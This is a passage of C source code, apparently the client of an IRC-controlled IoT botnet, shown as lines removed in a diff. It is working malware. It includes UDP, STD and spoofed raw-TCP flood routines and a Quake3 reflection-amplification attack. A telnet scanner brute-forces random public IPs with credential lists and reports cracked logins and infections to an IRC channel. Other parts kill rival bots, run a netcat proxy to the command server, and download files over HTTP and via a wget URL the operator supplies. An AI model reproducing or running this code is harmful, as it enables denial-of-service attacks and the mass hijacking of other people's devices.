- exit(1);
- }
- secs=atol(argv[2]);
- memset((void*)&in,0,sizeof(struct sockaddr_in));
- in.sin_addr.s_addr=host2ip(sender,argv[1]);
- in.sin_family = AF_INET;
- Send(sock, "NOTICE %s :Unknowning %s.\n", sender,argv[1]);
- while(1) {
- in.sin_port = rand();
- if ((fd = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0);
- else {
- flag=1;
- ioctl(fd,FIONBIO,&flag);
- sendto(fd,buf,9216,0,(struct sockaddr*)&in,sizeof(in));
- close(fd);
- }
- if (i >= 50) {
- if (time(NULL) >= start+secs) break;
- i=0;
- }
- i++;
- }
- close(fd);
- exit(0);
- }
- static void printchar(unsigned char **str, int c) {
- if (str) {
- **str = c;
- ++(*str);
- }
- else (void)write(1, &c, 1);
- }
- static int prints(unsigned char **out, const unsigned char *string, int width, int pad) {
- register int pc = 0, padchar = ' ';
- if (width > 0) {
- register int len = 0;
- register const unsigned char *ptr;
- for (ptr = string; *ptr; ++ptr) ++len;
- if (len >= width) width = 0;
- else width -= len;
- if (pad & PAD_ZERO) padchar = '0';
- }
- if (!(pad & PAD_RIGHT)) {
- for ( ; width > 0; --width) {
- printchar (out, padchar);
- ++pc;
- }
- }
- for ( ; *string ; ++string) {
- printchar (out, *string);
- ++pc;
- }
- for ( ; width > 0; --width) {
- printchar (out, padchar);
- ++pc;
- }
- return pc;
- }
- static int printi(unsigned char **out, int i, int b, int sg, int width, int pad, int letbase) {
- unsigned char print_buf[PRINT_BUF_LEN];
- register unsigned char *s;
- register int t, neg = 0, pc = 0;
- register unsigned int u = i;
- if (i == 0) {
- print_buf[0] = '0';
- print_buf[1] = '\0';
- return prints (out, print_buf, width, pad);
- }
- if (sg && b == 10 && i < 0) {
- neg = 1;
- u = -i;
- }
- s = print_buf + PRINT_BUF_LEN-1;
- *s = '\0';
- while (u) {
- t = u % b;
- if( t >= 10 )
- t += letbase - '0' - 10;
- *--s = t + '0';
- u /= b;
- }
- if (neg) {
- if( width && (pad & PAD_ZERO) ) {
- printchar (out, '-');
- ++pc;
- --width;
- }
- else {
- *--s = '-';
- }
- }
- return pc + prints (out, s, width, pad);
- }
- static int print(unsigned char **out, const unsigned char *format, va_list args ) {
- register int width, pad;
- register int pc = 0;
- unsigned char scr[2];
- for (; *format != 0; ++format) {
- if (*format == '%') {
- ++format;
- width = pad = 0;
- if (*format == '\0') break;
- if (*format == '%') goto out;
- if (*format == '-') {
- ++format;
- pad = PAD_RIGHT;
- }
- while (*format == '0') {
- ++format;
- pad |= PAD_ZERO;
- }
- for ( ; *format >= '0' && *format <= '9'; ++format) {
- width *= 10;
- width += *format - '0';
- }
- if( *format == 's' ) {
- register char *s = (char *)va_arg( args, int );
- pc += prints (out, s?s:"(null)", width, pad);
- continue;
- }
- if( *format == 'd' ) {
- pc += printi (out, va_arg( args, int ), 10, 1, width, pad, 'a');
- continue;
- }
- if( *format == 'x' ) {
- pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'a');
- continue;
- }
- if( *format == 'X' ) {
- pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'A');
- continue;
- }
- if( *format == 'u' ) {
- pc += printi (out, va_arg( args, int ), 10, 0, width, pad, 'a');
- continue;
- }
- if( *format == 'c' ) {
- scr[0] = (unsigned char)va_arg( args, int );
- scr[1] = '\0';
- pc += prints (out, scr, width, pad);
- continue;
- }
- }
- else {
- out:
- printchar (out, *format);
- ++pc;
- }
- }
- if (out) **out = '\0';
- va_end( args );
- return pc;
- }
- int szprintf(unsigned char *out, const unsigned char *format, ...) {
- va_list args;
- va_start( args, format );
- return print( &out, format, args );
- }
- in_addr_t getRandomPublicIP() {
- static uint8_t ipState[4] = {0};
- ipState[0] = rand() % 223;
- ipState[1] = rand() % 255;
- ipState[2] = rand() % 255;
- ipState[3] = rand() % 255;
- while(
- (ipState[0] == 0) ||
- (ipState[0] == 10) ||
- (ipState[0] == 100 && (ipState[1] >= 64 && ipState[1] <= 127)) ||
- (ipState[0] == 127) ||
- (ipState[0] == 169 && ipState[1] == 254) ||
- (ipState[0] == 172 && (ipState[1] <= 16 && ipState[1] <= 31)) ||
- (ipState[0] == 192 && ipState[1] == 0 && ipState[2] == 2) ||
- (ipState[0] == 192 && ipState[1] == 88 && ipState[2] == 99) ||
- (ipState[0] == 192 && ipState[1] == 168) ||
- (ipState[0] == 198 && (ipState[1] == 18 || ipState[1] == 19)) ||
- (ipState[0] == 198 && ipState[1] == 51 && ipState[2] == 100) ||
- (ipState[0] == 203 && ipState[1] == 0 && ipState[2] == 113) ||
- (ipState[0] >= 224)
- )
- {
- ipState[0] = rand() % 223;
- ipState[1] = rand() % 255;
- ipState[2] = rand() % 255;
- ipState[3] = rand() % 255;
- }
- char ip[16] = {0};
- szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
- return inet_addr(ip);
- }
- int negotiate(int sock, unsigned char *buf, int len) {
- unsigned char c;
- switch (buf[1]) {
- case CMD_IAC: return 0;
- case CMD_WILL:
- case CMD_WONT:
- case CMD_DO:
- case CMD_DONT:
- c = CMD_IAC;
- send(sock, &c, 1, MSG_NOSIGNAL);
- if (CMD_WONT == buf[1]) c = CMD_DONT;
- else if (CMD_DONT == buf[1]) c = CMD_WONT;
- else if (OPT_SGA == buf[1]) c = (buf[1] == CMD_DO ? CMD_WILL : CMD_DO);
- else c = (buf[1] == CMD_DO ? CMD_WONT : CMD_DONT);
- send(sock, &c, 1, MSG_NOSIGNAL);
- send(sock, &(buf[2]), 1, MSG_NOSIGNAL);
- break;
- default:
- break;
- }
- return 0;
- }
- int contains_string(char* buffer, char** strings) {
- int num_strings = 0, i = 0;
- for(num_strings = 0; strings[++num_strings] != 0; );
- for(i = 0; i < num_strings; i++) {
- if(strcasestr(buffer, strings[i])) {
- return 1;
- }
- }
- return 0;
- }
- int contains_success(char* buffer) {
- return contains_string(buffer, successes);
- }
- int contains_fail(char* buffer) {
- return contains_string(buffer, fails);
- }
- int contains_response(char* buffer) {
- return contains_success(buffer) || contains_fail(buffer);
- }
- int read_with_timeout(int fd, int timeout_usec, char* buffer, int buf_size) {
- fd_set read_set;
- struct timeval tv;
- tv.tv_sec = 0;
- tv.tv_usec = timeout_usec;
- FD_ZERO(&read_set);
- FD_SET(fd, &read_set);
- if (select(fd+1, &read_set, NULL, NULL, &tv) < 1)
- return 0;
- return recv(fd, buffer, buf_size, 0);
- }
- int read_until_response(int fd, int timeout_usec, char* buffer, int buf_size, char** strings) {
- int num_bytes, i;
- memset(buffer, 0, buf_size);
- num_bytes = read_with_timeout(fd, timeout_usec, buffer, buf_size);
- if(buffer[0] == 0xFF) {
- negotiate(fd, buffer, 3);
- }
- if(contains_string(buffer, strings)) {
- return 1;
- }
- return 0;
- }
- const char* get_telstate_host(struct telstate_t* telstate) { // get host
- struct in_addr in_addr_ip;
- in_addr_ip.s_addr = telstate->ip;
- return inet_ntoa(in_addr_ip);
- }
- void advance_telstate(struct telstate_t* telstate, int new_state) { // advance
- if(new_state == 0) {
- close(telstate->fd);
- }
- telstate->tTimeout = 0;
- telstate->state = new_state;
- memset((telstate->sockbuf), 0, SOCKBUF_SIZE);
- }
- void reset_telstate(struct telstate_t* telstate) { // reset
- advance_telstate(telstate, 0);
- telstate->complete = 1;
- }
- void TelnetScanner(int wait_usec, int maxfds, int sock) {
- int max = getdtablesize() - 100, i, res, num_tmps, j;
- char buf[128], cur_dir;
- if (max > maxfds)
- max = maxfds;
- fd_set fdset;
- struct timeval tv;
- socklen_t lon;
- int valopt;
- char line[256];
- char* buffer;
- struct sockaddr_in dest_addr;
- dest_addr.sin_family = AF_INET;
- dest_addr.sin_port = htons(23);
- memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
- buffer = malloc(SOCKBUF_SIZE + 1);
- memset(buffer, 0, SOCKBUF_SIZE + 1);
- struct telstate_t fds[max];
- memset(fds, 0, max * (sizeof(int) + 1));
- for(i = 0; i < max; i++)
- {
- memset(&(fds[i]), 0, sizeof(struct telstate_t));
- fds[i].complete = 1;
- fds[i].sockbuf = buffer;
- }
- while(1) {
- for(i = 0; i < max; i++) {
- if(fds[i].tTimeout == 0) {
- fds[i].tTimeout = time(NULL);
- }
- switch(fds[i].state) {
- case 0:
- {
- if(fds[i].complete == 1)
- {
- char *tmp = fds[i].sockbuf;
- memset(&(fds[i]), 0, sizeof(struct telstate_t));
- fds[i].sockbuf = tmp;
- fds[i].ip = getRandomPublicIP();
- }
- else if(fds[i].complete == 0)
- {
- fds[i].usernameInd++;
- fds[i].passwordInd++;
- if(fds[i].passwordInd == sizeof(Telnet_Passwords) / sizeof(char *))
- {
- fds[i].complete = 1;
- continue;
- }
- if(fds[i].usernameInd == sizeof(Telnet_Usernames) / sizeof(char *))
- {
- fds[i].complete = 1;
- continue;
- }
- }
- dest_addr.sin_family = AF_INET;
- dest_addr.sin_port = htons(23);
- memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
- dest_addr.sin_addr.s_addr = fds[i].ip;
- fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
- if(fds[i].fd == -1) continue;
- fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
- if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS)
- {
- reset_telstate(&fds[i]);
- }
- else
- {
- advance_telstate(&fds[i], 1);
- }
- }
- break;
- case 1:
- {
- FD_ZERO(&fdset);
- FD_SET(fds[i].fd, &fdset);
- tv.tv_sec = 0;
- tv.tv_usec = wait_usec;
- res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
- if(res == 1) {
- fds[i].tTimeout = 0;
- lon = sizeof(int);
- valopt = 0;
- getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
- if(valopt)
- {
- reset_telstate(&fds[i]);
- }
- else
- {
- fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
- advance_telstate(&fds[i], 2);
- }
- continue;
- }
- else if(res == -1)
- {
- reset_telstate(&fds[i]);
- continue;
- }
- if(fds[i].tTimeout + 7 < time(NULL))
- {
- reset_telstate(&fds[i]);
- }
- }
- break;
- case 2:
- {
- if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
- {
- fds[i].tTimeout = time(NULL);
- if(contains_fail(fds[i].sockbuf))
- {
- advance_telstate(&fds[i], 0);
- }
- else
- {
- advance_telstate(&fds[i], 3);
- }
- continue;
- }
- if(fds[i].tTimeout + 7 < time(NULL))
- {
- reset_telstate(&fds[i]);
- }
- }
- break;
- case 3:
- {
- if(send(fds[i].fd, Telnet_Usernames[fds[i].usernameInd], strlen(Telnet_Usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0)
- {
- reset_telstate(&fds[i]);
- continue;
- }
- if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
- {
- reset_telstate(&fds[i]);
- continue;
- }
- advance_telstate(&fds[i], 4);
- }
- break;
- case 4:
- {
- if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
- {
- fds[i].tTimeout = time(NULL);
- if(contains_fail(fds[i].sockbuf))
- {
- advance_telstate(&fds[i], 0);
- }
- else
- {
- advance_telstate(&fds[i], 5);
- }
- continue;
- }
- if(fds[i].tTimeout + 7 < time(NULL))
- {
- reset_telstate(&fds[i]);
- }
- }
- break;
- case 5:
- {
- if(send(fds[i].fd, Telnet_Passwords[fds[i].passwordInd], strlen(Telnet_Passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0)
- {
- reset_telstate(&fds[i]);
- continue;
- }
- if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
- {
- reset_telstate(&fds[i]);
- continue;
- }
- advance_telstate(&fds[i], 6);
- }
- break;
- case 6:
- {
- if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances2))
- {
- fds[i].tTimeout = time(NULL);
- if(contains_fail(fds[i].sockbuf))
- {
- advance_telstate(&fds[i], 0);
- }
- else if(contains_success(fds[i].sockbuf))
- {
- if(fds[i].complete == 2)
- {
- advance_telstate(&fds[i], 7);
- }
- else
- {
- Send(sock, "PRIVMSG %s :[TELNET] [+] LOGIN CRACKED ---> %s:%s:%s\n", CHAN, get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
- advance_telstate(&fds[i], 7);
- }
- }
- else
- {
- reset_telstate(&fds[i]);
- }
- continue;
- }
- if(fds[i].tTimeout + 7 < time(NULL))
- {
- reset_telstate(&fds[i]);
- }
- }
- break;
- case 7:
- {
- fds[i].tTimeout = time(NULL);
- if(send(fds[i].fd, Telnet_Payload, strlen(Telnet_Payload), MSG_NOSIGNAL) < 0)
- {
- Send(sock, "PRIVMSG %s :[TELNET] [+] SUCCESSFUL INFECTION ---> %s:%s:%s\n", CHAN, inet_ntoa(*(struct in_addr *)&(fds[i].ip)), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
- reset_telstate(&fds[i]);
- continue;
- }
- if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, "REBIRTH"))
- {
- if(strcasestr(fds[i].sockbuf, "REBIRTH") && fds[i].complete != 3)
- {
- Send(sock, "PRIVMSG %s :[TELNET] [+] PAYLOAD SENT ---> %s:%s:%s\n", CHAN, get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
- fds[i].complete = 3;
- }
- }
- if(fds[i].tTimeout + 45 < time(NULL))
- {
- if(fds[i].complete!=3)
- {
- Send(sock, "PRIVMSG %s :[TELNET] [-] FAILED INFECTION ---> %s:%s:%s\n", CHAN, get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
- }
- reset_telstate(&fds[i]);
- }
- break;
- }
- }
- }
- }
- }
- void startScanner(int sock) {
- uint32_t parent;
- parent = fork();
- int ii = 0;
- int forks = sysconf( _SC_NPROCESSORS_ONLN );
- int fds = 999999;
- if(forks == 1) fds = 500;
- if(forks >= 2) fds = 1000;
- if (parent > 0) {
- scanPid = parent;
- return;
- } else if(parent == -1) return;
- for (ii = 0; ii < forks; ii++) {
- srand((time(NULL) ^ getpid()) + getppid());
- init_rand(time(NULL) ^ getpid());
- TelnetScanner(100, fds, sock);
- _exit(0);
- }
- }
- void botkill() {
- int i;
- FILE *fp;
- char path[1024];
- char *PID[8];
- char *command[128];
- for (i = 0; i < NUMITEMS(Bot_Killer_Binarys); i++) {
- printf("Scanning for %s\n", Bot_Killer_Binarys[i]);
- sprintf(command, "pidof -s %s", Bot_Killer_Binarys[i]);
- /* Open the command for reading. */
- fp = popen(command, "r");
- if (fp == NULL) {
- printf("Failed to run command\n" );
- return;
- }
- /* Read the output a line at a time - output it. */
- while (fgets(path, sizeof(path)-1, fp) != NULL) {
- sprintf(PID, "%s", path);
- }
- /* close */
- pclose(fp);
- if(atoi(PID) > 0) {
- printf("Botkilling %s PID %d\n", Bot_Killer_Binarys[i], PID);
- kill(atoi(PID), 9);
- } else if(1 == system(command)) {
- //A process having name PROCESS is NOT running.
- }
- }
- }
- char *getPublicIP() {
- int fd;
- struct ifreq ifr;
- fd = socket(AF_INET, SOCK_DGRAM, 0);
- ifr.ifr_addr.sa_family = AF_INET;
- snprintf(ifr.ifr_name, IFNAMSIZ, "eth0");
- ioctl(fd, SIOCGIFADDR, &ifr);
- /* and more importantly */
- printf("%s\n", inet_ntoa(((struct sockaddr_in *)&ifr.ifr_addr)->sin_addr));
- close(fd);
- }
- void proxyflux(int sock, char *sender, int argc, char **argv) {
- if (mfork(sender) != 0) return;
- char *command[128];
- Send(sock, "NOTICE %s :[PROXY] [+] Starting proxy.\n", sender);
- sprintf(command, "nc -l -k -p ");
- strcat(command, PROXY_PORT);
- strcat(command, " -c \"nc ");
- strcat(command, SERVER_ADDR);
- strcat(command, " 6667\" &");
- system(command);
- Send(sock, "NOTICE %s :[PROXY] [+] Started proxy service on %s:%d\n", sender, getPublicIP(), PROXY_PORT);
- pthread_exit(NULL);
- exit(0);
- }
- struct alist
- {
- struct sockaddr_in data;
- struct list *next;
- struct list *prev;
- };
- struct list *head;
- volatile int tehport;
- volatile int limiter;
- volatile unsigned int pps;
- volatile unsigned int sleeptime = 100;
- struct quakethread_data{ int thread_id; struct alist *list_node; struct sockaddr_in sin; };
- void setup_ip_header(struct iphdr *iph)
- {
- iph->ihl = 5;
- iph->version = 4;
- iph->tos = 0;
- iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 14;
- iph->id = htonl(54321);
- iph->frag_off = 0;
- iph->ttl = MAXTTL;
- iph->protocol = IPPROTO_UDP;
- iph->check = 0;
- iph->saddr = inet_addr("192.168.3.100");
- }
- void setup_quake_udp_header(struct udphdr *udph)
- {
- udph->source = htons(5678);
- udph->dest = htons(27960);
- udph->check = 0;
- memcpy((void *)udph + sizeof(struct udphdr), "\xff\xff\xff\xff\x67\x65\x74\x73\x74\x61\x74\x75\x73\x0a", 14);
- udph->len=htons(sizeof(struct udphdr) + 14);
- }
- void *quakeflood(void *par1)
- {
- struct quakethread_data *td = (struct quakethread_data *)par1;
- char datagram[MAX_PACKET_SIZE];
- struct iphdr *iph = (struct iphdr *)datagram;
- struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
- struct sockaddr_in sin = td->sin;
- struct alist *list_node = td->list_node;
- int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
- if(s < 0){
- fprintf(stderr, "Could not open raw socket.\n");
- exit(-1);
- }
- init_rand(time(NULL));
- memset(datagram, 0, MAX_PACKET_SIZE);
- setup_ip_header(iph);
- setup_quake_udp_header(udph);
- udph->source = htons(rand() % 65535 - 1026);
- iph->saddr = sin.sin_addr.s_addr;
- iph->daddr = list_node->data.sin_addr.s_addr;
- iph->check = ccsum ((unsigned short *) datagram, iph->tot_len >> 1);
- int tmp = 1;
- const int *val = &tmp;
- if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
- fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
- exit(-1);
- }
- init_rand(time(NULL));
- register unsigned int i;
- i = 0;
- while(1){
- sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
- list_node = list_node->next;
- iph->daddr = list_node->data.sin_addr.s_addr;
- iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
- iph->check = ccsum ((unsigned short *) datagram, iph->tot_len >> 1);
- pps++;
- if(i >= limiter)
- {
- i = 0;
- usleep(sleeptime);
- }
- i++;
- }
- }
- void quake3(int sock, char *sender, int argc, char *argv[])
- {
- if (mfork(sender) != 0) return;
- char *command[128];
- if(argc < 6) {
- Send(sock, "NOTICE %s :QUAKE3 <target IP> <target port> <reflection file url> <threads> <pps limiter, -1 for no limit> <time>\n", sender);
- exit(-1);
- }
- srand(time(NULL));
- int i = 0;
- head = NULL;
- fprintf(stdout, "Setting up sockets...\n");
- int max_len = 128;
- char *buffer = (char *) malloc(max_len);
- buffer = memset(buffer, 0x00, max_len);
- int num_threads = atoi(argv[4]);
- int maxpps = atoi(argv[5]);
- limiter = 0;
- pps = 0;
- int multiplier = 20;
- sprintf(command, "wget \"%s\" -O QUAKE3.txt", argv[3]);
- system(command);
- Send(sock, "NOTICE %s :QUAKE3 Amp attacking %s:%s\n", sender, argv[1], argv[2]);
- FILE *list_fd = fopen("QUAKE3.txt", "r");
- while (fgets(buffer, max_len, list_fd) != NULL) {
- if ((buffer[strlen(buffer) - 1] == '\n') ||
- (buffer[strlen(buffer) - 1] == '\r')) {
- buffer[strlen(buffer) - 1] = 0x00;
- if(head == NULL)
- {
- head = (struct alist *)malloc(sizeof(struct alist));
- bzero(&head->data, sizeof(head->data));
- head->data.sin_addr.s_addr=inet_addr(buffer);
- head->next = head;
- head->prev = head;
- } else {
- struct alist *new_node = (struct alist *)malloc(sizeof(struct alist));
- memset(new_node, 0x00, sizeof(struct alist));
- new_node->data.sin_addr.s_addr=inet_addr(buffer);
- new_node->prev = head;
- new_node->next = head->next;
- head->next = new_node;
- }
- i++;
- } else {
- continue;
- }
- }
- struct alist *current = head->next;
- pthread_t thread[num_threads];
- struct sockaddr_in sin;
- sin.sin_family = AF_INET;
- sin.sin_addr.s_addr = inet_addr(argv[1]);
- struct quakethread_data td[num_threads];
- for(i = 0;i<num_threads;i++){
- td[i].thread_id = i;
- td[i].sin= sin;
- td[i].list_node = current;
- pthread_create( &thread[i], NULL, &quakeflood, (void *) &td[i]);
- }
- fprintf(stdout, "Starting flood...\n");
- for(i = 0;i<(atoi(argv[6])*multiplier);i++)
- {
- usleep((1000/multiplier)*1000);
- if((pps*multiplier) > maxpps)
- {
- if(1 > limiter)
- {
- sleeptime+=100;
- } else {
- limiter--;
- }
- } else {
- limiter++;
- if(sleeptime > 25)
- {
- sleeptime-=25;
- } else {
- sleeptime = 0;
- }
- }
- pps = 0;
- }
- }
- int listFork() {
- uint32_t parent, *newpids, i;
- parent = fork();
- if (parent <= 0) return parent;
- numpids++;
- newpids = (uint32_t*)malloc((numpids + 1) * 4);
- for (i = 0; i < numpids - 1; i++) newpids[i] = pids[i];
- newpids[numpids - 1] = parent;
- free(pids);
- pids = newpids;
- return parent;
- }
- void SendTheSTD(unsigned char *ip, int port, int secs) {
- int iSTD_Sock;
- iSTD_Sock = socket(AF_INET, SOCK_DGRAM, 0);
- time_t start = time(NULL);
- struct sockaddr_in sin;
- struct hostent *hp;
- hp = gethostbyname(ip);
- bzero((char*) &sin,sizeof(sin));
- bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
- sin.sin_family = hp->h_addrtype;
- sin.sin_port = port;
- unsigned int a = 0;
- while(1){
- if (a >= 50) {
- send(iSTD_Sock, "std", 69, 0);
- connect(iSTD_Sock,(struct sockaddr *) &sin, sizeof(sin));
- if (time(NULL) >= start + secs) {
- close(iSTD_Sock);
- _exit(0);
- }
- a = 0;
- }
- a++;
- }
- }
- void sendSTD(int sock, char *sender, int argc, char **argv) {
- //!* STD TARGET PORT TIME
- if (mfork(sender) != 0) return;
- if(argc < 3) {
- Send(sock, "NOTICE %s :STD <ip> <port> <time>\n", sender);
- exit(1);
- }
- unsigned char *ip = argv[1];
- int port = atoi(argv[2]);
- int time = atoi(argv[3]);
- if(strstr(ip, ",") != NULL) {
- unsigned char *hi = strtok(ip, ",");
- while(hi != NULL) {
- if(!listFork()) {
- Send(sock, "NOTICE %s :STD attacking %s:%s\n", sender,argv[1],argv[2]);
- SendTheSTD(hi, port, time);
- _exit(0);
- }
- hi = strtok(NULL, ",");
- }
- } else {
- if (listFork()) {
- exit(1);
- }
- Send(sock, "NOTICE %s :STD attacking %s:%s\n", sender,argv[1],argv[2]);
- SendTheSTD(ip, port, time);
- _exit(0);
- }
- }
- int getHost(unsigned char *toGet, struct in_addr *i) {
- struct hostent *h;
- if((i->s_addr = inet_addr(toGet)) == -1) return 1;
- return 0;
- }
- void makeIPPacket(struct iphdr *iph, uint32_t dest, uint32_t source, uint8_t protocol, int packetSize) {
- iph->ihl = 5;
- iph->version = 4;
- iph->tos = 0;
- iph->tot_len = sizeof(struct iphdr) + packetSize;
- iph->id = rand_cmwc();
- iph->frag_off = 0;
- iph->ttl = MAXTTL;
- iph->protocol = protocol;
- iph->check = 0;
- iph->saddr = source;
- iph->daddr = dest;
- }
- void SendTCP(unsigned char *target, int port, int timeEnd, unsigned char *flags, int packetsize, int pollinterval, int spoofit) {
- register unsigned int pollRegister;
- pollRegister = pollinterval;
- struct sockaddr_in dest_addr;
- dest_addr.sin_family = AF_INET;
- if(port == 0) dest_addr.sin_port = rand_cmwc();
- else dest_addr.sin_port = htons(port);
- if(getHost(target, &dest_addr.sin_addr)) return;
- memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
- int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
- if(!sockfd) { return; }
- int tmp = 1;
- if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0) { return; }
- in_addr_t netmask;
- if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );
- else netmask = ( ~((1 << (32 - spoofit)) - 1) );
- unsigned char packet[sizeof(struct iphdr) + sizeof(struct tcphdr) + packetsize];
- struct iphdr *iph = (struct iphdr *)packet;
- struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
- makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomPublicIP(netmask) ), IPPROTO_TCP, sizeof(struct tcphdr) + packetsize);
- tcph->source = rand_cmwc();
- tcph->seq = rand_cmwc();
- tcph->ack_seq = 0;
- tcph->doff = 5;
- if(!strcmp(flags, "all")) {
- tcph->syn = 1;
- tcph->rst = 1;
- tcph->fin = 1;
- tcph->ack = 1;
- tcph->psh = 1;
- } else {
- unsigned char *pch = strtok(flags, ",");
- while(pch) {
- if(!strcmp(pch, "syn")) { tcph->syn = 1;
- } else if(!strcmp(pch, "rst")) { tcph->rst = 1;
- } else if(!strcmp(pch, "fin")) { tcph->fin = 1;
- } else if(!strcmp(pch, "ack")) { tcph->ack = 1;
- } else if(!strcmp(pch, "psh")) { tcph->psh = 1;
- } else {
- }
- pch = strtok(NULL, ",");
- }
- }
- tcph->window = rand_cmwc();
- tcph->check = 0;
- tcph->urg_ptr = 0;
- tcph->dest = (port == 0 ? rand_cmwc() : htons(port));
- tcph->check = ccsum(iph, tcph);
- iph->check = ccsum ((unsigned short *) packet, iph->tot_len);
- int end = time(NULL) + timeEnd;
- register unsigned int i = 0;
- while(1) {
- sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
- iph->saddr = htonl( getRandomPublicIP(netmask) );
- iph->id = rand_cmwc();
- tcph->seq = rand_cmwc();
- tcph->source = rand_cmwc();
- tcph->check = 0;
- tcph->check = ccsum(iph, tcph);
- iph->check = ccsum ((unsigned short *) packet, iph->tot_len);
- if(i == pollRegister) {
- if(time(NULL) > end) break;
- i = 0;
- continue;
- }
- i++;
- }
- }
- void tcpflood(int sock, char *sender, int argc, char **argv) {
- if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || (argc > 5 && atoi(argv[5]) < 0) || (argc == 7 && atoi(argv[6]) < 1)) {
- Send(sock, "NOTICE %s :TCP <target> <port> <time> <flags> <packetsize> <pollinterval>\n", sender);
- return;
- }
- if (mfork(sender) != 0) return;
- unsigned char *ip = argv[1];
- int port = atoi(argv[2]);
- int time = atoi(argv[3]);
- unsigned char *flags = argv[4];
- int pollinterval = argc == 7 ? atoi(argv[6]) : 10;
- int packetsize = argc > 5 ? atoi(argv[5]) : 0;
- int spoofed = 32;
- if(strstr(ip, ",") != NULL) {
- unsigned char *hi = strtok(ip, ",");
- while(hi != NULL) {
- if(!listFork()) {
- Send(sock, "NOTICE %s :TCP flooding %s:%d with flags %s\n", sender, hi, port, flags);
- SendTCP(hi, port, time, flags, packetsize, pollinterval, spoofed);
- _exit(0);
- }
- hi = strtok(NULL, ",");
- }
- } else {
- if (listFork()) {
- return;
- }
- Send(sock, "NOTICE %s :TCP flooding %s:%d with flags %s\n", sender, ip, port, flags);
- SendTCP(ip, port, time, flags, packetsize, pollinterval, spoofed);
- _exit(0);
- }
- }
- void update(int sock, char *sender, int argc, char **argv) {
- int sock2,i,d;
- struct sockaddr_in server;
- unsigned long ipaddr;
- unsigned char dgcc;
- char buf[1024], *file;
- FILE *gcc;
- int parent=getpid();
- if (mfork(sender) != 0) return;
- if (argc < 2) {
- Send(sock, "NOTICE %s :UPDATEHTTP <host> <src:bin>\n", sender);
- exit(0);
- }
- if ((sock2 = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
- Send(sock, "NOTICE %s :Unable to create socket (Wierd, you shouldnt get this error and ITS NOT MY FAULT!).\n", sender);
- exit(0);
- }
- server.sin_family = AF_INET;
- server.sin_port = htons(80);
- if ((ipaddr = inet_addr(argv[1])) == -1) {
- struct hostent *hostm;
- if ((hostm=gethostbyname(argv[1])) == NULL) {
- Send(sock, "NOTICE %s :Unable to resolve address.\n", sender);
- exit(0);
- }
- memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
- }
- else server.sin_addr.s_addr = ipaddr;
- memset(&(server.sin_zero), 0, 8);
- if (connect(sock2,(struct sockaddr *)&server, sizeof(server)) != 0) {
- Send(sock, "NOTICE %s :Unable to connect to http.\n", sender);
- exit(0);
- }
- gcc=popen("gcc --help","r");
- if (gcc != NULL) {
- memset(buf,0,1024);
- fgets(buf,1024,gcc);
- if (!strstr(buf,"Usage")) dgcc=0;
- else dgcc=1;
- pclose(gcc);
- } else dgcc=0;
- for (i=0;i<strlen(argv[2]) && argv[2][i] != ':';i++);
- argv[2][i]=0;
- if (dgcc) file=argv[2];
- else file=argv[2]+i+1;
- Send(sock2,"GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n",file,argv[1]);
